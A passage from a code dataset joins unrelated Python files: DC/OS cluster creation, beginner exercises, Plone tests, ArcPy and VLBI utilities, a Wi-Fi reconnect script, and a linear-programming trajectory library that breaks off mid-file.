get_doctor_message(\n doctor_command_name=doctor_command_name,\n )\n public_key_path = workspace_dir / 'id_rsa.pub'\n private_key_path = workspace_dir / 'id_rsa'\n write_key_pair(\n public_key_path=public_key_path,\n private_key_path=private_key_path,\n )\n\n dcos_variant = get_install_variant(\n given_variant=variant,\n installer_path=installer,\n workspace_dir=workspace_dir,\n doctor_message=doctor_message,\n enable_spinner=enable_spinner,\n )\n\n # This is useful for some people to identify containers.\n container_name_prefix = Docker().container_name_prefix + '-' + cluster_id\n\n cluster_backend = Docker(\n container_name_prefix=container_name_prefix,\n custom_container_mounts=custom_volume,\n custom_master_mounts=custom_master_volume,\n custom_agent_mounts=custom_agent_volume,\n custom_public_agent_mounts=custom_public_agent_volume,\n linux_distribution=linux_distribution,\n docker_version=docker_version,\n storage_driver=docker_storage_driver,\n docker_container_labels={\n CLUSTER_ID_LABEL_KEY: cluster_id,\n WORKSPACE_DIR_LABEL_KEY: str(workspace_dir),\n },\n docker_master_labels={\n NODE_TYPE_LABEL_KEY: NODE_TYPE_MASTER_LABEL_VALUE,\n },\n docker_agent_labels={NODE_TYPE_LABEL_KEY: NODE_TYPE_AGENT_LABEL_VALUE},\n docker_public_agent_labels={\n NODE_TYPE_LABEL_KEY: NODE_TYPE_PUBLIC_AGENT_LABEL_VALUE,\n },\n workspace_dir=workspace_dir,\n transport=transport,\n network=network,\n one_master_host_port_map=one_master_host_port_map,\n mount_sys_fs_cgroup=mount_sys_fs_cgroup,\n )\n\n cluster = create_cluster(\n cluster_backend=cluster_backend,\n masters=masters,\n agents=agents,\n public_agents=public_agents,\n doctor_message=doctor_message,\n enable_spinner=enable_spinner,\n )\n\n cluster_containers = ClusterContainers(\n cluster_id=cluster_id,\n transport=transport,\n )\n private_ssh_key_path = cluster_containers.ssh_key_path\n private_ssh_key_path.parent.mkdir(parents=True)\n private_key_path.replace(private_ssh_key_path)\n\n add_authorized_key(cluster=cluster, public_key_path=public_key_path)\n\n for node in cluster.masters:\n for path_pair in copy_to_master:\n local_path, remote_path = path_pair\n node.send_file(\n local_path=local_path,\n remote_path=remote_path,\n )\n\n dcos_config = get_config(\n cluster_representation=cluster_containers,\n extra_config=extra_config,\n dcos_variant=dcos_variant,\n security_mode=security_mode,\n license_key=license_key,\n )\n\n cluster_install_dcos_from_path(\n cluster=cluster,\n cluster_representation=cluster_containers,\n dcos_config=dcos_config,\n ip_detect_path=cluster_backend.ip_detect_path,\n doctor_message=doctor_message,\n dcos_installer=installer,\n files_to_copy_to_genconf_dir=files_to_copy_to_genconf_dir,\n enable_spinner=enable_spinner,\n )\n\n run_post_install_steps(\n cluster=cluster,\n cluster_id=cluster_id,\n dcos_config=dcos_config,\n doctor_command_name=doctor_command_name,\n http_checks=http_checks,\n wait_command_name=wait_command_name,\n wait_for_dcos=wait_for_dcos,\n enable_spinner=enable_spinner,\n )\n","repo_name":"dcos/dcos-e2e","sub_path":"src/dcos_e2e_cli/dcos_docker/commands/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":7721,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"40"} +{"seq_id":"41483658470","text":"from datetime import datetime\n\n\ndef voto(id = 0):\n idade = datetime.now().year - id\n if idade < 16 or idade > 65:\n valor = 'Não vota'\n return idade, valor\n elif idade >= 16 and idade < 18:\n valor = 'Voto Opcional'\n return idade, valor\n elif idade >= 18 or idade < 65:\n valor = 'Voto Obrigatorio'\n return idade, valor\n\n\nprint('-'*40)\nano = int(input('digite seu ano de nascimento: '))\nprint(f'Com idade {voto(ano)[0]}: {voto(ano)[1]}')\n","repo_name":"Nathan120/Arq_Python_CursoEmVideo","sub_path":"Curso_Gustavo_Guanabara/Exercicio101.py","file_name":"Exercicio101.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73295381561","text":"#https://leetcode.com/problems/median-of-two-sorted-arrays/description/\nclass Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n nums3 = []\n lena = len(nums1) +len(nums2)\n nums3 = nums1+nums2\n nums3.sort()\n half = (lena//2)-1\n if (lena % 2 ==0):\n median = (nums3[half]+nums3[half+1])/2\n print(nums3[half],nums3[half+1])\n else:\n median = nums3[lena//2]\n print(nums3,half,lena)\n return median","repo_name":"BhanuKedhar09/Problems","sub_path":"Problem_Solving/Median_of_Two_Sorted_Arrays.py","file_name":"Median_of_Two_Sorted_Arrays.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34009646713","text":"from Seq1 import Seq\n\nprint(\"-----| Practice 1, Exercise 10 |------\")\n\ngene_list =[\"U5\", \"ADA\", \"FRAT1\", \"FXN\", \"RNU6_269P\" ]\nfolder = \"../Session-04/\"\n\nfor gene in gene_list:\n file = folder + gene + \".txt\"\n sequence = Seq()\n sequence.read_fasta(file)\n A, C, T, G = Seq.count_base(sequence)\n max_base = max([A, C, T, G])\n nucleotides_dict = {\"A\": A, \"C\": C, \"T\": T, \"G\": G}\n for k, v in nucleotides_dict.items():\n if v == max_base:\n print(f\"Gene {gene}: Most frequent base: {k}\")\n","repo_name":"JavierSequeiro/PROGRAMMING-IN-NETWORK-ENVIRONMENTS","sub_path":"P1/Ex10.py","file_name":"Ex10.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22279073188","text":"from Products.CMFCore.utils import getToolByName\nfrom santa.templates.tests.base import IntegrationTestCase\n\n\nclass TestCase(IntegrationTestCase):\n \"\"\"TestCase for Plone setup.\"\"\"\n\n def setUp(self):\n self.portal = self.layer['portal']\n\n def test_is_santa_templates_installed(self):\n installer = getToolByName(self.portal, 'portal_quickinstaller')\n self.failUnless(installer.isProductInstalled('santa.templates'))\n\n def test_is_santa_content_installed(self):\n installer = getToolByName(self.portal, 'portal_quickinstaller')\n self.failUnless(installer.isProductInstalled('santa.content'))\n\n def test_is_collective_contentleadimage_installed(self):\n installer = getToolByName(self.portal, 'portal_quickinstaller')\n self.failUnless(installer.isProductInstalled('collective.contentleadimage'))\n\n def test_is_PloneFormGen_installed(self):\n installer = getToolByName(self.portal, 'portal_quickinstaller')\n self.failUnless(installer.isProductInstalled('PloneFormGen'))\n\n def test_browserlayer(self):\n from santa.templates.browser.interfaces import ISantaTemplatesLayer\n from plone.browserlayer import utils\n self.failUnless(ISantaTemplatesLayer in utils.registered_layers())\n\n def test_metadata__version(self):\n setup = getToolByName(self.portal, 'portal_setup')\n self.assertEqual(\n setup.getVersionForProfile('profile-santa.templates:default'),\n u'1')\n\n def test__cli_properties(self):\n portal_properties = getToolByName(self.portal, 'portal_properties')\n cli_properties = getattr(portal_properties, 'cli_properties')\n self.assertEqual(\n cli_properties.getProperty('allowed_types'),\n ('Event', 'FormFolder'))\n\n def test_viewlets__santa_top_manager(self):\n from zope.component import getUtility\n from plone.app.viewletmanager.interfaces import IViewletSettingsStorage\n storage = getUtility(IViewletSettingsStorage)\n self.assertEqual(\n storage.getOrder('santa.top.manager', '*'),\n (\n u'santa.viewlet.about',\n u'santa.viewlet.news',\n u'santa.viewlet.comingevents',\n u'santa.viewlet.latestevents',\n u'santa.viewlet.partners',\n u'santa.viewlet.cases',\n ))\n\n def test_viewlets__santa_folder_manager(self):\n from zope.component import getUtility\n from plone.app.viewletmanager.interfaces import IViewletSettingsStorage\n storage = getUtility(IViewletSettingsStorage)\n self.assertEqual(\n storage.getOrder('santa.folder.manager', '*'),\n (\n u'santa.viewlet.folder',\n )\n )\n\n def test_uninstall__package(self):\n installer = getToolByName(self.portal, 'portal_quickinstaller')\n installer.uninstallProducts(['santa.templates'])\n self.failIf(installer.isProductInstalled('santa.templates'))\n\n def test_uninstall__browserlayer(self):\n installer = getToolByName(self.portal, 'portal_quickinstaller')\n installer.uninstallProducts(['santa.templates'])\n from santa.templates.browser.interfaces import ISantaTemplatesLayer\n from plone.browserlayer import utils\n self.failIf(ISantaTemplatesLayer in utils.registered_layers())\n","repo_name":"taito-zz/santa.templates","sub_path":"src/santa/templates/tests/test_setup.py","file_name":"test_setup.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34772460861","text":"import time\r\n\r\n\r\ndef make_file_copy(file_to_copy):\r\n f_contents = ''\r\n with open(file_to_copy, 'r') as orig_file:\r\n f_contents = orig_file.read() # dump the contents\r\n\r\n with open(f'copy_of_{file_to_copy.replace(\".txt\", \"\")}.txt {time.time()}', 'w') as copy:\r\n copy.write(f_contents) # write the contents into new file\r\n\r\n\r\nif __name__ == '__main__':\r\n make_file_copy('file.txt')\r\n","repo_name":"srinivas-kini/pypractice","sub_path":"practice/mk_file_cpy.py","file_name":"mk_file_cpy.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17568606213","text":"# coding=utf-8\n\nimport os\nimport time\nimport login\n\ndef PingTest():\n err = os.system('ping -4 -n 1 www.baidu.com')\n if err:\n return False\n else:\n return True\n\nflag = False\n\nwhile True:\n if PingTest():\n flag = False\n else:\n if flag:\n print('断开连接……')\n os.system('netsh wlan disconnect')\n time.sleep(5)\n print('尝试重新连接……')\n err = os.system('netsh wlan connect name=seu-wlan')\n if not err:\n time.sleep(30)\n print('正在登录……')\n login.login()\n else:\n print('发现网络异常')\n flag = True\n time.sleep(60)","repo_name":"NN708/seu-wlan-login","sub_path":"Python/auto-reconnect-win.py","file_name":"auto-reconnect-win.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"40"} +{"seq_id":"6081996856","text":"# coding: utf-8\n\n# --------------------------------------------------------------------------\n# --------------------------------------------------------------------------\n# Template.py\n# Version: 0.2\n# Date: 8/22/2023\n# Original Author: Kyle Smiley\n# --------------------------------------------------------------------------\n# --------------------------------------------------------------------------\n#\n# This code will read and copy parcels tables to a file gdb for each.\n\n#Do the same, but for tables\n# Edit code to exclude the Logfile and rename with same name as Parcels features.\n\n# Import libraries\nimport arcpy\nimport os\n\n#Set workspace and parameters\narcpy.env.overwriteOutput = True\nworkspace = arcpy.GetParameterAsText(0) # DataType = folder\noutgdb = arcpy.GetParameterAsText(1) # DataType = workspace\n\n# Copy the tables to the gdb\nwalk = arcpy.da.Walk(workspace, datatype = \"Table\")\nfor dirpath, dirnames, filenames in walk:\n for file in filenames:\n if file.startswith(\"Logfile\"):\n continue\n intable = os.path.join(dirpath, file)\n outtableName = \"Parcels\" + \"_\" + os.path.basename(dirpath) + \"Table\"\n outtable = os.path.join(outgdb, outtableName)\n arcpy.management.CopyRows(intable, outtable)\n\n","repo_name":"ksmiley92/MyScripts","sub_path":"CopyParcelsTablesToGDB.py","file_name":"CopyParcelsTablesToGDB.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15375640047","text":"import os\nfrom functools import lru_cache\n\nimport numpy as np\nimport resolve as rve\nimport pandas as pd\n\nimport fnmatch\n\nfrom .utilities import get_files_in_folder\nfrom .load_via_ehtim import load_uvfits\n\n\ndef filter_files(directory, file_filter):\n files = get_files_in_folder(directory)\n if file_filter is not None:\n direc = os.path.split(files[0])[0]\n files = [os.path.split(ff)[1] for ff in files]\n files = fnmatch.filter(files, file_filter)\n files = [os.path.join(direc, ff) for ff in files]\n return files\n\n@lru_cache(maxsize=None) \ndef load_observations(*,file_filter, minimum_antenna_distance,\n minimum_number_of_data_points_in_time_averaging_bin, load_polarization, directory,\n gap_time_for_averaging, **kwargs):\n double_precision = True\n files = filter_files(directory, file_filter)\n\n obs0 = []\n for ff in files:\n if os.path.splitext(ff)[1] == \".uvfits\" or os.path.splitext(ff)[1] == \".uvf\":\n obs0.append(load_uvfits(ff, load_polarization))\n elif os.path.splitext(ff)[1] == \".npz\":\n obs0.append(rve.Observation.load(ff))\n else:\n raise RuntimeError(f\"File format not known: {ff}\")\n\n obs = []\n\n for oo in obs0:\n # Flag short baselines\n min_dist = minimum_antenna_distance\n if min_dist is not None:\n coords = oo.auxiliary_table(\"ANTENNA\")[\"POSITION\"]\n for ant1 in range(coords.shape[0]):\n for ant2 in range(ant1, coords.shape[0]):\n dist = np.linalg.norm(coords[ant1] - coords[ant2])\n if dist < min_dist:\n oo = oo.flag_baseline(ant1, ant2)\n # /Flag short baselines\n\n # Prune empty rows\n oo = oo[~np.any(oo.weight.val == 0., (0,2))]\n\n assert np.all(oo.weight.val > 0.)\n # /Prune empty rows\n\n # Average scans\n ts_per_bin = minimum_number_of_data_points_in_time_averaging_bin\n gap_time = gap_time_for_averaging\n list_of_timebins = rve.fair_share_averaging(ts_per_bin, oo.time, gap_time)\n oo = oo.time_average(list_of_timebins)\n # /Average scans\n\n ind = np.lexsort((oo.ant2, oo.ant1, oo.time))\n oo = oo[ind]\n if double_precision:\n oo = oo.to_double_precision()\n obs.append(oo)\n return tuple(obs)\n\ndef load_alma_lightcurves(*, directory, folder, day, **kwargs):\n full_dir = os.path.join(directory, folder)\n files = filter_files(full_dir, f\"ALMA_lc_hi_{day}.h5\")\n dfs = []\n for f in files:\n df = pd.read_hdf(f, key='data')\n dfs.append(df)\n return dfs\n \n\n\n\n","repo_name":"jknollm/VLBI_Resolve_EHT_SgrA","sub_path":"src/data_loading.py","file_name":"data_loading.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69844585080","text":"import openai\nfrom docx import Document\nfrom docx.shared import Inches\nimport pywhatkit as pw\nfrom PyPDF2 import PdfReader\nfrom apikey import APIKEY\nopenai.api_key = APIKEY\n\nreader = PdfReader('DA.pdf')\n \n# printing number of pages in pdf file\n \n# getting a specific page from the pdf file\npage = reader.pages[0]\nuserName = input(\"Enter your name: \")\nuserRegNo = input(\"Enter your registration number: \")\n# extracting text from page\n\ninput2GPT = \"My name is \"+ userName + \". My registration number is \"+ userRegNo + \". Below is my homework. Put my name and registration number at the top of the assignment and solve it. \\n \" + page.extract_text()\n\noutput = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\", \n messages=[{\"role\": \"user\", \"content\": \n input2GPT}]\n )\n\noutputGPT = output['choices'][0]['message']['content']\nprint(\"DA executed successfully. Check \")\n\ndocument = Document()\np = document.add_paragraph(outputGPT)\ndocument.add_page_break()\n\ndocument.save(userName + userRegNo + '_DA' +'.docx')\n","repo_name":"angeryrohan/Dobby","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18975685876","text":"\ndef calc_Conv(k,z, nr_k):\n parameters = (((k**2)*z)+1)*nr_k\n return parameters\ndef calc_fully(c,p):\n parameters = (c*p)+(1*c)\n return parameters\n\ndef calc_output():\n pass\n\n#input\nx1 = 25\ny1 = 25\nz1 = 3\n#filter/kernel\nk1=3\nstride = 2\nnmbr_k = 14\npad=1\n\n#conv size\n#13x13x14\nconv_size = ((x1-k1+(2*pad))/stride)+1\n#maxpoolsize\n#12x12x14\np_size = ((13-2)/1)+1\n# fully connected layer\nFC = 15\n# output\nOut = 10\nFc_size = ((x1-k1+(2*pad))/stride)+1\n\nconv1 = calc_Conv(k1,z1,nmbr_k)\nprint(conv1)\ns = 12*14*14\ns1 = 15\nfully_c = calc_fully(s1, s)\nprint(fully_c)\ns2 = 10\nfully_c2 = calc_fully(s2, s1)\nprint(fully_c2)\n\n","repo_name":"nicoleadamah/Neural-Networks-FFR135","sub_path":"Neural Networks - FFR135/Homework 3/CNN parameters/Parameters.py","file_name":"Parameters.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1306047034","text":"import numpy as np\nimport pulp\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport time\n\ndef lpAffExpAsTuple(ee):\n return tuple([(v[0].name,v[1]) for v in ee.items()])\n\ndef oppositeLpExpAsTuple(ee):\n return tuple([(v[0].name,-v[1]) for v in ee.items()])\n\ndef lpConstraintsOppose(e1,e2):\n return lpAffExpAsTuple(e1)==oppositeLpExpAsTuple(e2)\n\ndef pointsOnHemisphere(Nel,Naz):\n M = np.transpose(np.vstack((np.cos(np.pi*np.array(range(Naz))/Naz),np.sin(np.pi*np.array(range(Naz))/Naz))))\n el_range=np.array(range((1-Nel),Nel))*0.5*np.pi/Nel\n el_range=np.reshape(el_range,(2*Nel-1,1))\n M2 = np.kron(np.cos(el_range),M)\n M3 = np.kron(np.sin(el_range),np.ones((Naz,1)))\n M4 = np.hstack((M2,M3))\n M5 = np.vstack((np.array([0,0,1]),M4))\n return(M5)\n\ndef testHemisphere(Nel=10,Naz=10):\n M = pointsOnHemisphere(Nel,Naz)\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n ax.scatter(M[:,0],M[:,1],M[:,2])\n plt.show()\n\nclass LpProbVectors(pulp.LpProblem):\n\n def __init__(self,name=\"NoName\",sense=1):\n # initialize parent Pulp class\n pulp.LpProblem.__init__(self, name, sense)\n self.leq_list = []\n self.contradictory = False\n\n def newVarVector(self,name,num_elems):\n v = []\n for ii in range(num_elems):\n newvar = pulp.LpVariable(\"%s_%i\" % (name,ii))\n v.append(newvar)\n self.addVariable(newvar)\n return v\n\n def addVecEqualZeroConstraint(self,vector_expression,name=None):\n for ii,ee in enumerate(vector_expression):\n if name is not None:\n loc_name = \"%s_%i\" % (name,ii)\n else:\n loc_name = None\n self.addConstraint(ee==0.0,name=loc_name)\n\n def addLeqZeroConstraint(self,ee):\n # capture this for quick feasibility checking\n # add it as a constraint in usual way\n self.addConstraint(ee<=0.0)\n # extract opposing constants\n opp_consts = [c.constant for c in self.leq_list if lpConstraintsOppose(ee,c)]\n # check if present\n if len(opp_consts)>0:\n max_opp_const = np.max(opp_consts)\n if max_opp_const > -ee.constant:\n self.contradictory = True\n # add new expression to the list\n self.leq_list += [ee]\n\n def addVecLessEqZeroConstraint(self,vector_expression):\n for ee in vector_expression:\n self.addLeqZeroConstraint(ee)\n\n def addMaxVarConstraint(self,vector_expression):\n # adds decision variable to grab max(e)\n newvar = pulp.LpVariable(\"_max%i\" % (self.numVariables()+1))\n for ee in vector_expression:\n self.addConstraint(ee-newvar<=0.0)\n return newvar\n\n def vectorValue(self,vector_expression):\n v = []\n for ee in vector_expression:\n v.append(ee.value())\n return np.array(v)\n\nclass LTraj(LpProbVectors):\n\n def __init__(self,A,B,Nt,name=\"NoName\",sense=1,num_agents=1):\n # initialize parent Pulp class\n LpProbVectors.__init__(self, name, sense)\n # begin with no objective at all\n self+=0.0\n # check size compatibility\n assert A.shape[1]==A.shape[0], \"A must be square\"\n assert B.shape[0]==A.shape[0], \"B must have same row count as A\"\n # store horizon\n self.Nt = Nt\n self.num_agents = num_agents\n self.num_states = num_agents*A.shape[0]\n self.num_inputs = num_agents*B.shape[1]\n self.var_x = [[] for kk in range(self.Nt+1)]\n self.var_u = [[] for kk in range(self.Nt)]\n self.avar_x = []\n self.avar_u = []\n for aa in range(num_agents):\n # set up state and input variables\n self.avar_x.append([self.newVarVector(\"x%i(0)\" % (aa+1),A.shape[0])])\n self.var_x[0].extend(self.avar_x[aa][0])\n self.avar_u.append([])\n for kk in range(self.Nt):\n self.avar_x[aa].append(self.newVarVector(\"x%i(%i)\" % (aa+1,kk+1),A.shape[0]))\n self.avar_u[aa].append(self.newVarVector(\"u%i(%i)\" % (aa+1,kk),B.shape[1]))\n self.addVecEqualZeroConstraint(np.dot(np.array(A),self.avar_x[aa][kk])+np.dot(np.array(B),self.avar_u[aa][kk]) - self.avar_x[aa][kk+1])\n self.var_x[kk+1].extend(self.avar_x[aa][kk+1])\n self.var_u[kk].extend(self.avar_u[aa][kk])\n\n\n def setInitialState(self,x0):\n self.addVecEqualZeroConstraint(self.var_x[0]-np.array(x0),name='xinit')\n self.init_x = x0\n\n def changeInitState(self,x0):\n assert len(x0)==self.num_states\n self.init_x = x0\n for ii in range(self.num_states):\n self.constraints[(\"xinit_%i\" % ii)].changeRHS(x0[ii])\n\n def setTerminalState(self,xN):\n self.addVecEqualZeroConstraint(self.var_x[self.Nt]-np.array(xN),name='xterm')\n self.term_x = xN\n\n def changeTermState(self,xN):\n assert len(xN)==self.num_states\n self.term_x = xN\n for ii in range(self.num_states):\n self.constraints[(\"xterm_%i\" % ii)].changeRHS(xN[ii])\n\n def addInfNormStageCost(self,E,F, agent='aug'):\n # adds sum_k ||Ex(k)+Fu(k)||_inf to cost\n for kk in range(self.Nt):\n if agent=='aug':\n newvar=self.addMaxVarConstraint(\n np.hstack((\n np.dot(np.array(E), self.var_x[kk])+np.dot(np.array(F), self.var_u[kk]),\n np.dot(-np.array(E), self.var_x[kk])+np.dot(-np.array(F), self.var_u[kk])\n ))\n )\n self.objective += newvar\n elif agent in range(self.num_agents):\n newvar=self.addMaxVarConstraint(\n np.hstack((\n np.dot(np.array(E), self.avar_x[agent][kk])+np.dot(np.array(F), self.avar_u[agent][kk]),\n np.dot(-np.array(E), self.avar_x[agent][kk])+np.dot(-np.array(F), self.avar_u[agent][kk])\n ))\n )\n self.objective += newvar\n elif agent=='all':\n for aa in range(self.num_agents):\n newvar=self.addMaxVarConstraint(\n np.hstack((\n np.dot(np.array(E), self.avar_x[aa][kk])+np.dot(np.array(F), self.avar_u[aa][kk]),\n np.dot(-np.array(E), self.avar_x[aa][kk])+np.dot(-np.array(F), self.avar_u[aa][kk])\n ))\n )\n self.objective += newvar\n\n def addStageConstraints(self, C, D, e, agent='aug'):\n # adds Cx(k)+Du(k)<=e to constraints\n for kk in range(self.Nt):\n if agent=='aug':\n self.addVecLessEqZeroConstraint(np.dot(np.array(C), self.var_x[kk])+np.dot(np.array(D), self.var_u[kk])-e)\n elif agent in range(self.num_agents):\n self.addVecLessEqZeroConstraint(np.dot(np.array(C), self.avar_x[agent][kk]) + np.dot(np.array(D), self.avar_u[agent][kk]) - e)\n elif agent=='all':\n for aa in range(self.num_agents):\n self.addVecLessEqZeroConstraint(np.dot(np.array(C), self.avar_x[aa][kk]) + np.dot(np.array(D), self.avar_u[aa][kk]) - e)\n\n def add2NormStageCost(self,E,F,Nc=20):\n # adds sum_k ||Ex(k)+Fu(k)||_2 to cost\n # where E and F must both have two rows\n # approximated by Nc linear constraints\n M = np.transpose(np.vstack((np.cos(np.pi*np.array(range(Nc))/Nc),np.sin(np.pi*np.array(range(Nc))/Nc))))\n self.addInfNormStageCost(np.dot(M,E),np.dot(M,F))\n\n def add2Norm3DStageCost(self,E,F,Naz=11,Nel=7):\n # adds sum_k ||Ex(k)+Fu(k)||_2 to cost\n # where E and F must both have THREE rows\n # approximated by 2*Naz*Nel linear constraints\n M = pointsOnHemisphere(Nel,Naz)\n self.addInfNormStageCost(np.dot(M,E),np.dot(M,F))\n\n def plotStateHistory(self):\n for ii in range(self.num_states):\n plt.plot([x[ii].varValue for x in self.var_x])\n plt.grid()\n plt.show()\n\n def plotStateControlHistory(self):\n plt.subplot(2,1,1)\n for ii in range(self.num_states):\n plt.plot([x[ii].varValue for x in self.var_x],'-x')\n plt.grid()\n plt.subplot(2,1,2)\n for ii in range(self.num_inputs):\n plt.plot([u[ii].varValue for u in self.var_u],'-x')\n plt.grid()\n plt.show()\n\ndef mutliTest3(num_agents):\n A = np.eye(2)\n B = np.array([[1],[1]])\n lt = LTraj(A,B,5,num_agents=num_agents)\n return lt\n\nclass UnionConstraint:\n \n def __init__(self,c,seq=100,name=None):\n self.name = name\n self.seq = seq\n self.cons = c\n \n def __repr__(self):\n or_sep = '\\n OR\\n '\n and_sep = '\\n '\n rep = ('\\n' + self.name + ':\\n{\\n ' +\n or_sep.join([and_sep.join([repr(f) for f in e]) for e in self.cons]) +\n '\\n}')\n return rep\n \n def convertToMILP(self,M,bin_name):\n # constraint list\n con_list = []\n # number of regions\n Nr = len(self.cons)\n # expression for final binary constraint\n bin_con = 0.0\n for ii in range(Nr):\n this_region_exp = self.cons[ii]\n # new binary dec var\n new_bin = pulp.LpVariable(\"%s_%i\" % (bin_name,ii),cat='Binary')\n # new constraint for each inequality defining the region\n for cc in this_region_exp:\n con_list.append(cc-M*new_bin<=0)\n # add the binary to the logic constraint\n bin_con += new_bin\n # add the logical constraint\n con_list.append(bin_con <= (Nr-1))\n return con_list\n\nclass LpProbUnionCons(LpProbVectors):\n\n def __init__(self,name=\"NoName\",sense=1,presolver=None):\n # initialize parent Pulp class\n LpProbVectors.__init__(self, name, sense)\n # and set list of union constraints to zero\n self.union_cons = []\n # identify incompatible combinations early\n self.taboo_list = []\n # store solver early if given\n self.presolver = presolver\n # flag if converted to MILP already\n self.has_been_MILPed = False\n\n def addUnionConstraint(self,c,seq=100,name=None):\n # c should be a tuple of vector expressions\n # constraint x in union{c[0]<=0, c[1]<=0, ...}\n # elements do not have to be same size\n if name is None:\n name = (\"_union%i\" % (1+len(self.union_cons)))\n self.union_cons.append(UnionConstraint(c,seq,name))\n \n def delUnionConstraint(self,ii):\n del self.union_cons[ii]\n \n def delUnionConByName(self,name):\n try:\n print(\"Deleting union constraint %s.\" % name)\n names = [c.names for c in self.union_cons]\n ii = names.index(name)\n self.delUnionConstraint(ii)\n except ValueError:\n print(\"Can't find union constraint with name %s.\" % name)\n\n def __repr__(self):\n repr1 = LpProbVectors.__repr__(self)\n union_sep = '\\n'\n repr2 = \"\\nUNIONS\\n\" + union_sep.join([repr(c) for c in self.union_cons]) \n return(repr1+repr2)\n\n def _getNextNode(self,strategy='depth'):\n if strategy=='depth':\n # depth first search \n node = self.node_list.pop()\n elif strategy=='breadth':\n # breadth first search\n node = self.node_list.pop(0)\n elif strategy=='best_bound':\n bound_list = [n.lower_bound for n in self.node_list]\n best_idx = np.argmin(bound_list)\n node = self.node_list.pop(best_idx)\n elif strategy=='least_infeas':\n infeas_list = [n.infeas for n in self.node_list]\n best_idx = np.argmin(infeas_list)\n node = self.node_list.pop(best_idx)\n elif strategy=='random_hybrid':\n # choose randomly between depth and breadth\n if np.random.uniform()>0.5:\n # depth\n node = self.node_list.pop()\n else:\n # breadth\n node = self.node_list.pop(0)\n else:\n # default back to depth first \n node = self.node_list.pop()\n return(node)\n\n def _solInUnionRegion(self,r):\n v = self.vectorValue(r)\n if np.max(v)<=0.0:\n flag_reg = True\n else:\n flag_reg = False\n return flag_reg\n\n def _unionConSatisfied(self,c):\n flag_sat = False\n for r in c:\n if self._solInUnionRegion(r):\n flag_sat = True\n break\n return flag_sat\n\n def _unionFeasible(self):\n flag_feas = True\n for ci,cc in enumerate(self.union_cons):\n if self._unionConSatisfied(cc):\n continue\n else:\n flag_feas = False\n self.first_violated_union = cc\n self.first_violated_index = ci\n break\n return flag_feas\n\n def _childNode(self):\n # first just call the existing deepcopy inheritend from LpProblem\n new_node = LpProbUnionCons(name = self.name, sense = self.sense)\n # and copy the lower bound and the union constraints across\n new_node.union_cons = self.union_cons[:]\n new_node.leq_list = self.leq_list[:]\n new_node.lower_bound = self.lower_bound\n # copy objective\n new_node.objective = self.objective.copy()\n # infeasibility (used later for node selection)\n new_node.infeas = 0\n # copy constraints\n new_node.constraints = self.constraints.copy()\n # note not bothering to copy node list, as only relevant for root\n return new_node\n\n def _branch(self,parent_node):\n parent_node.lower_bound = parent_node.objective.value()\n for rr in parent_node.first_violated_union:\n new_node = parent_node._childNode()\n new_node.union_cons.pop(parent_node.first_violated_index)\n new_node.addVecLessEqZeroConstraint(rr)\n new_node.infeas = np.max(self.vectorValue(rr))\n self.node_list.append(new_node)\n\n def _sort_unions(self):\n # sort by supplied sequence number or priority\n decorated = [(self.union_cons_seqs[i],i) for i in range(len(self.union_cons))]\n decorated.sort()\n self.union_cons = [self.union_cons[i] for (seq,i) in decorated]\n # and sort the sequence list to avoid silliness\n self.union_cons_seqs = [seq for (seq,i) in decorated]\n # and the name list\n self.union_cons_names = [self.union_cons_names[i] for (seq,i) in decorated]\n\n def _status_msg(self,msg):\n if self.verbosity>=10:\n if np.mod(self.lp_count,self.verbosity)==0:\n print(\"%i : %i : %f : %s\" % (self.lp_count,len(self.node_list),self.incumbent_cost,msg))\n elif self.verbosity>=1:\n print(\"%i : %i : %f : %s\" % (self.lp_count,len(self.node_list),self.incumbent_cost,msg))\n\n def solveByBranchBound(self,Nmaxnodes=1000,Nmaxiters=5000,strategy='least_infeas',verbosity=1,**kwargs):\n print(\"Branch and bound solver needs updating for new UnionConstraint method\")\n assert(1<0) # stop before it gets any worse!\n start_time = time.clock()\n # no lower bound yet\n self.lower_bound = -np.inf\n # initialize the node list with root ULP\n self.node_list=[self._childNode()]\n # incumbent\n self.incumbent_cost=np.inf\n # count number of actual solves\n self.lp_count = 0\n # sort the union constraints for efficiency\n self._sort_unions()\n # store verbosity setting\n self.verbosity = verbosity\n # loop\n for nn in range(Nmaxiters):\n if len(self.node_list)==0:\n # finished - no more nodes\n self.status=1\n self._status_msg(\"OPTIMAL no more nodes\")\n break\n if self.lp_count==Nmaxnodes:\n # finished - no more nodes\n self.status=0\n self._status_msg(\"Node LP count limit reached\")\n break\n this_node = self._getNextNode(strategy)\n if this_node.lower_bound >= self.incumbent_cost:\n # fathomed as can't improve\n self._status_msg(\"Fathom before solving bound=%f\" % (this_node.lower_bound))\n continue\n # check for contradictory constraints\n if this_node.contradictory:\n # fathomed as 